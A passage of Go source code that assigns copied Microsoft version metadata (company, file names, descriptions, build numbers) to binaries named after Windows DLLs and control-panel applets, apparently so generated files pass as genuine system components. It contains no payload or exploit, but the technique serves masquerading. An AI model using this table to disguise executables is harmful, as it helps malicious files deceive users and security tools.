471 | vi.StringFileInfo.LegalTrademarks = "" 472 | vi.FixedFileInfo.ProductVersion.Patch = 18362 473 | vi.FixedFileInfo.ProductVersion.Major = 10 474 | vi.FixedFileInfo.ProductVersion.Minor = 0 475 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 476 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 477 | vi.FixedFileInfo.FileVersion.Major = 10 478 | vi.FixedFileInfo.FileVersion.Minor = 0 479 | vi.FixedFileInfo.FileVersion.Patch = 18362 480 | vi.FixedFileInfo.FileVersion.Build = 1 481 | vi.StringFileInfo.OriginalFilename = "Apphelp.dll" 482 | } 483 | if name == "bcryptprimitives" { 484 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 485 | vi.StringFileInfo.InternalName = "bcryptprimitives.dll" 486 | vi.StringFileInfo.FileDescription = "Windows Cryptographic Primitives Library" 487 | vi.StringFileInfo.FileVersion = "10.0.18362.836 (WinBuild.160101.0800)" 488 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 489 | vi.StringFileInfo.LegalTrademarks = "" 490 | vi.FixedFileInfo.ProductVersion.Patch = 18362 491 | vi.FixedFileInfo.ProductVersion.Major = 10 492 | vi.FixedFileInfo.ProductVersion.Minor = 0 493 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 494 | vi.StringFileInfo.ProductVersion = "10.0.18362.836" 495 | vi.FixedFileInfo.FileVersion.Major = 10 496 | vi.FixedFileInfo.FileVersion.Minor = 0 497 | vi.FixedFileInfo.FileVersion.Patch = 18362 498 | vi.FixedFileInfo.FileVersion.Build = 836 499 | vi.StringFileInfo.OriginalFilename = "bcryptprimitives.dll" 500 | } 501 | if name == "cfgmgr32" { 502 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 503 | vi.StringFileInfo.InternalName = "cfgmgr32.dll" 504 | vi.StringFileInfo.FileDescription = "Configuration Manager DLL" 505 | vi.StringFileInfo.FileVersion = "10.0.18362.387 (WinBuild.160101.0800)" 506 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 
507 | vi.StringFileInfo.LegalTrademarks = "" 508 | vi.FixedFileInfo.ProductVersion.Patch = 18362 509 | vi.FixedFileInfo.ProductVersion.Major = 10 510 | vi.FixedFileInfo.ProductVersion.Minor = 0 511 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 512 | vi.StringFileInfo.ProductVersion = "10.0.18362.387" 513 | vi.FixedFileInfo.FileVersion.Major = 10 514 | vi.FixedFileInfo.FileVersion.Minor = 0 515 | vi.FixedFileInfo.FileVersion.Patch = 18362 516 | vi.FixedFileInfo.FileVersion.Build = 387 517 | vi.StringFileInfo.OriginalFilename = "cfgmgr32.dll" 518 | } 519 | if name == "combase" { 520 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 521 | vi.StringFileInfo.InternalName = "COMBASE.DLL" 522 | vi.StringFileInfo.FileDescription = "Microsoft COM for Windows" 523 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 524 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 525 | vi.StringFileInfo.LegalTrademarks = "" 526 | vi.FixedFileInfo.ProductVersion.Patch = 18362 527 | vi.FixedFileInfo.ProductVersion.Major = 10 528 | vi.FixedFileInfo.ProductVersion.Minor = 0 529 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 530 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 531 | vi.FixedFileInfo.FileVersion.Major = 10 532 | vi.FixedFileInfo.FileVersion.Minor = 0 533 | vi.FixedFileInfo.FileVersion.Patch = 18362 534 | vi.FixedFileInfo.FileVersion.Build = 1 535 | vi.StringFileInfo.OriginalFilename = "COMBASE.DLL" 536 | } 537 | if name == "cryptsp" { 538 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 539 | vi.StringFileInfo.InternalName = "cryptsp.dll" 540 | vi.StringFileInfo.FileDescription = "Cryptographic Service Provider API" 541 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 542 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 
543 | vi.StringFileInfo.LegalTrademarks = "" 544 | vi.FixedFileInfo.ProductVersion.Patch = 18362 545 | vi.FixedFileInfo.ProductVersion.Major = 10 546 | vi.FixedFileInfo.ProductVersion.Minor = 0 547 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 548 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 549 | vi.FixedFileInfo.FileVersion.Major = 10 550 | vi.FixedFileInfo.FileVersion.Minor = 0 551 | vi.FixedFileInfo.FileVersion.Patch = 18362 552 | vi.FixedFileInfo.FileVersion.Build = 1 553 | vi.StringFileInfo.OriginalFilename = "cryptsp.dll" 554 | } 555 | if name == "dnsapi" { 556 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 557 | vi.StringFileInfo.InternalName = "dnsapi" 558 | vi.StringFileInfo.FileDescription = "DNS Client API DLL" 559 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 560 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 561 | vi.StringFileInfo.LegalTrademarks = "" 562 | vi.FixedFileInfo.ProductVersion.Patch = 18362 563 | vi.FixedFileInfo.ProductVersion.Major = 10 564 | vi.FixedFileInfo.ProductVersion.Minor = 0 565 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 566 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 567 | vi.FixedFileInfo.FileVersion.Major = 10 568 | vi.FixedFileInfo.FileVersion.Minor = 0 569 | vi.FixedFileInfo.FileVersion.Patch = 18362 570 | vi.FixedFileInfo.FileVersion.Build = 1 571 | vi.StringFileInfo.OriginalFilename = "dnsapi" 572 | } 573 | if name == "dpapi" { 574 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 575 | vi.StringFileInfo.InternalName = "dpapi.dll" 576 | vi.StringFileInfo.FileDescription = "Data Protection API" 577 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 578 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 
579 | vi.StringFileInfo.LegalTrademarks = "" 580 | vi.FixedFileInfo.ProductVersion.Patch = 18362 581 | vi.FixedFileInfo.ProductVersion.Major = 10 582 | vi.FixedFileInfo.ProductVersion.Minor = 0 583 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 584 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 585 | vi.FixedFileInfo.FileVersion.Major = 10 586 | vi.FixedFileInfo.FileVersion.Minor = 0 587 | vi.FixedFileInfo.FileVersion.Patch = 18362 588 | vi.FixedFileInfo.FileVersion.Build = 1 589 | vi.StringFileInfo.OriginalFilename = "dpapi.dll" 590 | } 591 | if name == "sechost" { 592 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 593 | vi.StringFileInfo.InternalName = "sechost.dll" 594 | vi.StringFileInfo.FileDescription = "Host for SCM/SDDL/LSA Lookup APIs" 595 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 596 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 597 | vi.StringFileInfo.LegalTrademarks = "" 598 | vi.FixedFileInfo.ProductVersion.Patch = 18362 599 | vi.FixedFileInfo.ProductVersion.Major = 10 600 | vi.FixedFileInfo.ProductVersion.Minor = 0 601 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 602 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 603 | vi.FixedFileInfo.FileVersion.Major = 10 604 | vi.FixedFileInfo.FileVersion.Minor = 0 605 | vi.FixedFileInfo.FileVersion.Patch = 18362 606 | vi.FixedFileInfo.FileVersion.Build = 1 607 | vi.StringFileInfo.OriginalFilename = "sechost.dll" 608 | } 609 | if name == "schannel" { 610 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 611 | vi.StringFileInfo.InternalName = "schannel.dll" 612 | vi.StringFileInfo.FileDescription = "TLS / SSL Security Provider" 613 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 614 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 
615 | vi.StringFileInfo.LegalTrademarks = "" 616 | vi.FixedFileInfo.ProductVersion.Patch = 18362 617 | vi.FixedFileInfo.ProductVersion.Major = 10 618 | vi.FixedFileInfo.ProductVersion.Minor = 0 619 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 620 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 621 | vi.FixedFileInfo.FileVersion.Major = 10 622 | vi.FixedFileInfo.FileVersion.Minor = 0 623 | vi.FixedFileInfo.FileVersion.Patch = 18362 624 | vi.FixedFileInfo.FileVersion.Build = 1 625 | vi.StringFileInfo.OriginalFilename = "schannel.dll" 626 | } 627 | if name == "urlmon" { 628 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 629 | vi.StringFileInfo.InternalName = "UrlMon.dll" 630 | vi.StringFileInfo.FileDescription = "OLE32 Extensions for Win32" 631 | vi.StringFileInfo.FileVersion = "11.00.18362.1 (WinBuild.160101.0800)" 632 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 633 | vi.StringFileInfo.LegalTrademarks = "" 634 | vi.FixedFileInfo.ProductVersion.Patch = 18362 635 | vi.FixedFileInfo.ProductVersion.Major = 11 636 | vi.FixedFileInfo.ProductVersion.Minor = 0 637 | vi.StringFileInfo.ProductName = "Internet Explorer" 638 | vi.StringFileInfo.ProductVersion = "11.00.18362.1" 639 | vi.FixedFileInfo.FileVersion.Major = 10 640 | vi.FixedFileInfo.FileVersion.Minor = 0 641 | vi.FixedFileInfo.FileVersion.Patch = 18362 642 | vi.FixedFileInfo.FileVersion.Build = 1 643 | vi.StringFileInfo.OriginalFilename = "UrlMon.dll" 644 | } 645 | if name == "win32u" { 646 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 647 | vi.StringFileInfo.InternalName = "Win32u" 648 | vi.StringFileInfo.FileDescription = "Win32u" 649 | vi.StringFileInfo.FileVersion = "10.0.18362.900 (WinBuild.160101.0800)" 650 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 
651 | vi.StringFileInfo.LegalTrademarks = "" 652 | vi.FixedFileInfo.ProductVersion.Patch = 18362 653 | vi.FixedFileInfo.ProductVersion.Major = 10 654 | vi.FixedFileInfo.ProductVersion.Minor = 0 655 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 656 | vi.StringFileInfo.ProductVersion = "10.0.18362.900" 657 | vi.FixedFileInfo.FileVersion.Major = 10 658 | vi.FixedFileInfo.FileVersion.Minor = 0 659 | vi.FixedFileInfo.FileVersion.Patch = 18362 660 | vi.FixedFileInfo.FileVersion.Build = 1 661 | vi.StringFileInfo.OriginalFilename = "Win32u" 662 | } 663 | if name == "appwizard" { 664 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 665 | vi.StringFileInfo.InternalName = "appwiz.cpl" 666 | vi.StringFileInfo.FileDescription = "Shell Application Manager" 667 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 668 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 669 | vi.StringFileInfo.OriginalFilename = "APPWIZ.CPL.MUI" 670 | vi.FixedFileInfo.ProductVersion.Patch = 18362 671 | vi.FixedFileInfo.ProductVersion.Major = 10 672 | vi.FixedFileInfo.ProductVersion.Minor = 0 673 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 674 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 675 | vi.FixedFileInfo.FileVersion.Major = 10 676 | vi.FixedFileInfo.FileVersion.Minor = 0 677 | vi.FixedFileInfo.FileVersion.Patch = 18362 678 | vi.FixedFileInfo.FileVersion.Build = 1 679 | vi.StringFileInfo.InternalName = "appwiz.cpl" 680 | } 681 | if name == "bthprop" { 682 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 683 | vi.StringFileInfo.InternalName = "bthprops.cpl" 684 | vi.StringFileInfo.FileDescription = "Bluetooth Control Panel Applet" 685 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 686 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 
687 | vi.StringFileInfo.OriginalFilename = "bluetooth.cpl.mui" 688 | vi.FixedFileInfo.ProductVersion.Patch = 18362 689 | vi.FixedFileInfo.ProductVersion.Major = 10 690 | vi.FixedFileInfo.ProductVersion.Minor = 0 691 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 692 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 693 | vi.FixedFileInfo.FileVersion.Major = 10 694 | vi.FixedFileInfo.FileVersion.Minor = 0 695 | vi.FixedFileInfo.FileVersion.Patch = 18362 696 | vi.FixedFileInfo.FileVersion.Build = 1 697 | vi.StringFileInfo.InternalName = "bthprops.cpl" 698 | } 699 | if name == "desktop" { 700 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 701 | vi.StringFileInfo.InternalName = "desk.cpl" 702 | vi.StringFileInfo.FileDescription = "Desktop Settings Control Panel" 703 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 704 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 705 | vi.StringFileInfo.OriginalFilename = "DESK.CPL.MUI" 706 | vi.FixedFileInfo.ProductVersion.Patch = 18362 707 | vi.FixedFileInfo.ProductVersion.Major = 10 708 | vi.FixedFileInfo.ProductVersion.Minor = 0 709 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 710 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 711 | vi.FixedFileInfo.FileVersion.Major = 10 712 | vi.FixedFileInfo.FileVersion.Minor = 0 713 | vi.FixedFileInfo.FileVersion.Patch = 18362 714 | vi.FixedFileInfo.FileVersion.Build = 1 715 | vi.StringFileInfo.InternalName = "DESK" 716 | 717 | } 718 | if name == "netfirewall" { 719 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 720 | vi.StringFileInfo.InternalName = "Firewall.cpl" 721 | vi.StringFileInfo.FileDescription = "Windows Defender Firewall Control Panel DLL Launching Stub" 722 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 723 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 
724 | vi.StringFileInfo.OriginalFilename = "Firewall.cpl" 725 | vi.FixedFileInfo.ProductVersion.Patch = 18362 726 | vi.FixedFileInfo.ProductVersion.Major = 10 727 | vi.FixedFileInfo.ProductVersion.Minor = 0 728 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 729 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 730 | vi.FixedFileInfo.FileVersion.Major = 10 731 | vi.FixedFileInfo.FileVersion.Minor = 0 732 | vi.FixedFileInfo.FileVersion.Patch = 18362 733 | vi.FixedFileInfo.FileVersion.Build = 1 734 | vi.StringFileInfo.InternalName = "Firewall.cpl" 735 | } 736 | if name == "FlashPlayer" { 737 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 738 | vi.StringFileInfo.InternalName = " Adobe Flash Player Control Panel Applet 32.0" 739 | vi.StringFileInfo.FileDescription = " Adobe Flash Player Control Panel Applet" 740 | vi.StringFileInfo.FileVersion = "32.0.0.255" 741 | vi.StringFileInfo.LegalCopyright = " Copyright © 1996-2019 Adobe. All Rights Reserved. Adobe and Flash are either trademarks or registered trademarks in the United States and/or other countries." 
742 | vi.StringFileInfo.OriginalFilename = "FlashPlayerCPLApp.cpl" 743 | vi.FixedFileInfo.ProductVersion.Patch = 0 744 | vi.FixedFileInfo.ProductVersion.Major = 32 745 | vi.FixedFileInfo.ProductVersion.Minor = 0 746 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 747 | vi.StringFileInfo.ProductVersion = "32.0.0.255" 748 | vi.FixedFileInfo.FileVersion.Major = 32 749 | vi.FixedFileInfo.FileVersion.Minor = 0 750 | vi.FixedFileInfo.FileVersion.Patch = 0 751 | vi.FixedFileInfo.FileVersion.Build = 255 752 | vi.StringFileInfo.InternalName = "FlashPlayerCPLApp.cpl" 753 | } 754 | if name == "hardwarewiz" { 755 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 756 | vi.StringFileInfo.InternalName = "hdwwiz.cpl" 757 | vi.StringFileInfo.FileDescription = "Add Hardware Control Panel Applet" 758 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 759 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 760 | vi.StringFileInfo.OriginalFilename = "hdwwiz.cpl.mui" 761 | vi.FixedFileInfo.ProductVersion.Patch = 18362 762 | vi.FixedFileInfo.ProductVersion.Major = 10 763 | vi.FixedFileInfo.ProductVersion.Minor = 0 764 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 765 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 766 | vi.FixedFileInfo.FileVersion.Major = 10 767 | vi.FixedFileInfo.FileVersion.Minor = 0 768 | vi.FixedFileInfo.FileVersion.Patch = 18362 769 | vi.FixedFileInfo.FileVersion.Build = 1 770 | vi.StringFileInfo.InternalName = "hdwwiz" 771 | } 772 | if name == "inet" { 773 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 774 | vi.StringFileInfo.InternalName = "inetcpl.cpl" 775 | vi.StringFileInfo.FileDescription = "Internet Control Panel" 776 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 777 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 
778 | vi.StringFileInfo.OriginalFilename = "" 779 | vi.FixedFileInfo.ProductVersion.Patch = 18362 780 | vi.FixedFileInfo.ProductVersion.Major = 10 781 | vi.FixedFileInfo.ProductVersion.Minor = 0 782 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 783 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 784 | vi.FixedFileInfo.FileVersion.Major = 10 785 | vi.FixedFileInfo.FileVersion.Minor = 0 786 | vi.FixedFileInfo.FileVersion.Patch = 18362 787 | vi.FixedFileInfo.FileVersion.Build = 1 788 | vi.StringFileInfo.InternalName = "inetcpl.cpl" 789 | } 790 | if name == "control" { 791 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 792 | vi.StringFileInfo.InternalName = "intl.cpl" 793 | vi.StringFileInfo.FileDescription = "Control Panel DLL" 794 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 795 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 796 | vi.StringFileInfo.OriginalFilename = "" 797 | vi.FixedFileInfo.ProductVersion.Patch = 18362 798 | vi.FixedFileInfo.ProductVersion.Major = 10 799 | vi.FixedFileInfo.ProductVersion.Minor = 0 800 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 801 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 802 | vi.FixedFileInfo.FileVersion.Major = 10 803 | vi.FixedFileInfo.FileVersion.Minor = 0 804 | vi.FixedFileInfo.FileVersion.Patch = 18362 805 | vi.FixedFileInfo.FileVersion.Build = 1 806 | vi.StringFileInfo.InternalName = "CONTROL" 807 | } 808 | if name == "irprop" { 809 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 810 | vi.StringFileInfo.InternalName = "irprops.cpl" 811 | vi.StringFileInfo.FileDescription = "Infrared Control Panel Applet" 812 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 813 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 
814 | vi.StringFileInfo.OriginalFilename = "irprops.cpl" 815 | vi.FixedFileInfo.ProductVersion.Patch = 18362 816 | vi.FixedFileInfo.ProductVersion.Major = 10 817 | vi.FixedFileInfo.ProductVersion.Minor = 0 818 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 819 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 820 | vi.FixedFileInfo.FileVersion.Major = 10 821 | vi.FixedFileInfo.FileVersion.Minor = 0 822 | vi.FixedFileInfo.FileVersion.Patch = 18362 823 | vi.FixedFileInfo.FileVersion.Build = 1 824 | vi.StringFileInfo.InternalName = "Infrared Properties" 825 | } 826 | if name == "Game" { 827 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 828 | vi.StringFileInfo.InternalName = "joy.cpl" 829 | vi.StringFileInfo.FileDescription = "Game Controllers Control Panel Applet" 830 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 831 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 832 | vi.StringFileInfo.OriginalFilename = "JOY.CPL.MUI" 833 | vi.FixedFileInfo.ProductVersion.Patch = 18362 834 | vi.FixedFileInfo.ProductVersion.Major = 10 835 | vi.FixedFileInfo.ProductVersion.Minor = 0 836 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 837 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 838 | vi.FixedFileInfo.FileVersion.Major = 10 839 | vi.FixedFileInfo.FileVersion.Minor = 0 840 | vi.FixedFileInfo.FileVersion.Patch = 18362 841 | vi.FixedFileInfo.FileVersion.Build = 1 842 | vi.StringFileInfo.InternalName = "JOY.CPL" 843 | } 844 | if name == "inputs" { 845 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 846 | vi.StringFileInfo.InternalName = "main.cpl" 847 | vi.StringFileInfo.FileDescription = "Mouse and Keyboard Control Panel Applets" 848 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 849 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 
850 | vi.StringFileInfo.OriginalFilename = "main.cpl.mui" 851 | vi.FixedFileInfo.ProductVersion.Patch = 18362 852 | vi.FixedFileInfo.ProductVersion.Major = 10 853 | vi.FixedFileInfo.ProductVersion.Minor = 0 854 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 855 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 856 | vi.FixedFileInfo.FileVersion.Major = 10 857 | vi.FixedFileInfo.FileVersion.Minor = 0 858 | vi.FixedFileInfo.FileVersion.Patch = 18362 859 | vi.FixedFileInfo.FileVersion.Build = 1 860 | vi.StringFileInfo.InternalName = "main.cpl" 861 | 862 | } 863 | if name == "mimosys" { 864 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 865 | vi.StringFileInfo.InternalName = "mmsys.dll" 866 | vi.StringFileInfo.FileDescription = "Audio Control Panel" 867 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 868 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 869 | vi.StringFileInfo.OriginalFilename = "MMSys.cpl.mui" 870 | vi.FixedFileInfo.ProductVersion.Patch = 18362 871 | vi.FixedFileInfo.ProductVersion.Major = 10 872 | vi.FixedFileInfo.ProductVersion.Minor = 0 873 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 874 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 875 | vi.FixedFileInfo.FileVersion.Major = 10 876 | vi.FixedFileInfo.FileVersion.Minor = 0 877 | vi.FixedFileInfo.FileVersion.Patch = 18362 878 | vi.FixedFileInfo.FileVersion.Build = 1 879 | vi.StringFileInfo.InternalName = "mmsys.cpl" 880 | } 881 | if name == "ncp" { 882 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 883 | vi.StringFileInfo.InternalName = "ncpa.cpl" 884 | vi.StringFileInfo.FileDescription = "Network Connections Control-Panel Stub" 885 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 886 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 
887 | vi.StringFileInfo.OriginalFilename = "ncpa.cpl.mui" 888 | vi.FixedFileInfo.ProductVersion.Patch = 18362 889 | vi.FixedFileInfo.ProductVersion.Major = 10 890 | vi.FixedFileInfo.ProductVersion.Minor = 0 891 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 892 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 893 | vi.FixedFileInfo.FileVersion.Major = 10 894 | vi.FixedFileInfo.FileVersion.Minor = 0 895 | vi.FixedFileInfo.FileVersion.Patch = 18362 896 | vi.FixedFileInfo.FileVersion.Build = 1 897 | vi.StringFileInfo.InternalName = "ncpa.cpl" 898 | } 899 | if name == "power" { 900 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 901 | vi.StringFileInfo.InternalName = "powercfg.cpl" 902 | vi.StringFileInfo.FileDescription = "Power Management Configuration Control Panel Applet" 903 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 904 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 905 | vi.StringFileInfo.OriginalFilename = "POWERCFG.CPL.MUI" 906 | vi.FixedFileInfo.ProductVersion.Patch = 18362 907 | vi.FixedFileInfo.ProductVersion.Major = 10 908 | vi.FixedFileInfo.ProductVersion.Minor = 0 909 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 910 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 911 | vi.FixedFileInfo.FileVersion.Major = 10 912 | vi.FixedFileInfo.FileVersion.Minor = 0 913 | vi.FixedFileInfo.FileVersion.Patch = 18362 914 | vi.FixedFileInfo.FileVersion.Build = 1 915 | vi.StringFileInfo.InternalName = "powercfg.cpl" 916 | } 917 | if name == "speech" { 918 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 919 | vi.StringFileInfo.InternalName = "sapi.cpl" 920 | vi.StringFileInfo.FileDescription = "Speech UX Control Panel" 921 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 922 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 
923 | vi.StringFileInfo.OriginalFilename = "sapi.cpl.mui" 924 | vi.FixedFileInfo.ProductVersion.Patch = 18362 925 | vi.FixedFileInfo.ProductVersion.Major = 10 926 | vi.FixedFileInfo.ProductVersion.Minor = 0 927 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 928 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 929 | vi.FixedFileInfo.FileVersion.Major = 10 930 | vi.FixedFileInfo.FileVersion.Minor = 0 931 | vi.FixedFileInfo.FileVersion.Patch = 18362 932 | vi.FixedFileInfo.FileVersion.Build = 1 933 | vi.StringFileInfo.InternalName = "sapi.cpl" 934 | } 935 | 936 | if name == "system" { 937 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 938 | vi.StringFileInfo.InternalName = "sysdm.cpl" 939 | vi.StringFileInfo.FileDescription = "System Applet for the Control Panel" 940 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 941 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 942 | vi.StringFileInfo.OriginalFilename = "sysdm.cpl.mui" 943 | vi.FixedFileInfo.ProductVersion.Patch = 18362 944 | vi.FixedFileInfo.ProductVersion.Major = 10 945 | vi.FixedFileInfo.ProductVersion.Minor = 0 946 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 947 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 948 | vi.FixedFileInfo.FileVersion.Major = 10 949 | vi.FixedFileInfo.FileVersion.Minor = 0 950 | vi.FixedFileInfo.FileVersion.Patch = 18362 951 | vi.FixedFileInfo.FileVersion.Build = 1 952 | vi.StringFileInfo.InternalName = "sysdm.cpl" 953 | } 954 | if name == "Tablet" { 955 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 956 | vi.StringFileInfo.InternalName = "TabletPC.cpl" 957 | vi.StringFileInfo.FileDescription = "Tablet PC Control Panel" 958 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 959 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 
960 | vi.StringFileInfo.OriginalFilename = "tabletpc.cpl.mui" 961 | vi.FixedFileInfo.ProductVersion.Patch = 18362 962 | vi.FixedFileInfo.ProductVersion.Major = 10 963 | vi.FixedFileInfo.ProductVersion.Minor = 0 964 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 965 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 966 | vi.FixedFileInfo.FileVersion.Major = 10 967 | vi.FixedFileInfo.FileVersion.Minor = 0 968 | vi.FixedFileInfo.FileVersion.Patch = 18362 969 | vi.FixedFileInfo.FileVersion.Build = 1 970 | vi.StringFileInfo.InternalName = "TabletPC.cpl" 971 | } 972 | if name == "telephone" { 973 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 974 | vi.StringFileInfo.InternalName = "telephon.cpl" 975 | vi.StringFileInfo.FileDescription = "Telephony Control Panel" 976 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 977 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 978 | vi.StringFileInfo.OriginalFilename = "telephon.cpl.mui" 979 | vi.FixedFileInfo.ProductVersion.Patch = 18362 980 | vi.FixedFileInfo.ProductVersion.Major = 